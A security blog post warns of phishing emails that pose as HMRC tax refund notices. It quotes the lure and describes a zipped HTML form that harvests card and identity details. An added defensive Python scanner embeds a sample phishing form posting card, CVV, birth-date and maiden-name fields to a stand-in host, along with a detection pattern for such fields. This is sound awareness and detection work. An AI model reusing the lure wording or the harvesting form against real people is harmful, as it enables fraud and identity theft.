Phishers exploit HMRC tax error refund in UK

Graham Cluley

Tax authorities in the UK are contacting millions of people, telling them that they have paid the wrong amount of tax.

As the BBC reports, the mistakes in tax payment calculations have been uncovered following the introduction of a new computer system.

So, it’s good news for some (who will be receiving an unexpected windfall in the form of a tax rebate) and bad news for others, who will find that they are being asked to make uncomfortable additional payments to the HMRC.

And if you thought an unexpected extra tax demand was enough to worry about, there is a second risk for UK internet users: scammers are exploiting the confusion.


For instance, here’s a message we caught in our spam traps this morning which claimed to come from HMRC with the subject line “You Have An HMRC Refund”:

(Image: bogus HMRC refund email)

Part of the email reads:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the past years, our calculations show you have made over payments of 317.66GBP

Due to the high volume of refunds you must complete the online application.

Your refund may take up to 6 weeks to process please make sure you complete the form correctly.

In order to process your refund you will need to complete the attached application form.

Attached to the email is a file called Refund-Form.zip, which contains an HTML file called Refund-Form.htm which asks for information including your credit card details, full date of birth, and mother’s maiden name.

(Image: the phishing form)

If you do make the mistake of filling in the form, your confidential data is uploaded to a Chinese server. You’re not going to receive a windfall because of this form – you’ve just been phished.
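As an added example (not code from the original post), here is a defender-side check for the attachment pattern described above: a Python scanner that opens a zip attachment, finds any HTML file inside, and flags every form that either posts to a host outside the claimed sender's domain or asks for card, date-of-birth or maiden-name fields. The zip, its form, the host example.invalid and the field names are all constructed for this example.

```python
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Heuristic: field names a genuine tax rebate form would never ask for.
SENSITIVE = re.compile(r"card|cvv|expir|dob|birth|maiden", re.I)


class FormScanner(HTMLParser):
    """Collect each <form>'s action URL and the names of its <input>s."""
    def __init__(self):
        super().__init__()
        self.forms = []  # list of (action, [input names])

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append((a.get("action") or "", []))
        elif tag == "input" and self.forms:
            self.forms[-1][1].append(a.get("name") or "")


def scan_zip_attachment(data: bytes, claimed_sender_domain: str) -> list:
    """Return one finding per suspicious form found in HTML files inside the zip."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith((".htm", ".html")):
                continue
            p = FormScanner()
            p.feed(zf.read(name).decode("utf-8", "replace"))
            for action, fields in p.forms:
                host = urlparse(action).hostname or ""
                sensitive = [f for f in fields if SENSITIVE.search(f)]
                # A relative action has no host and is not counted as off-site.
                offsite = bool(host) and not host.endswith(claimed_sender_domain)
                if sensitive or offsite:
                    findings.append({"file": name, "host": host,
                                     "fields": sensitive, "offsite": offsite})
    return findings


# Constructed sample: a zip holding a "refund form" that posts to a third party.
SAMPLE_HTML = b"""<html><body><form action="http://example.invalid/collect.php" method="post">
<input name="fullname"><input name="card_number"><input name="cvv">
<input name="dob"><input name="mothers_maiden_name"></form></body></html>"""


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Refund-Form.htm", SAMPLE_HTML)
    return buf.getvalue()
```

Running `scan_zip_attachment(build_sample_zip(), "hmrc.gov.uk")` returns a single finding for Refund-Form.htm with four sensitive fields and an off-site post.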

The real HMRC website contains advice about scams like this, and clearly states that it would never notify customers of a tax rebate via email, or invite them to complete an online form to receive a rebate of tax.

You have been warned – don’t let your eagerness for a tax refund lead to you throwing caution to the wind.


Graham Cluley is an award-winning keynote speaker who has given presentations around the world about cybersecurity, hackers, and online privacy. A veteran of the computer security industry since the early 1990s, he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows, makes regular media appearances, and is the co-host of the popular "Smashing Security" podcast. Follow him on Twitter, Mastodon, Threads, Bluesky, or drop him an email.
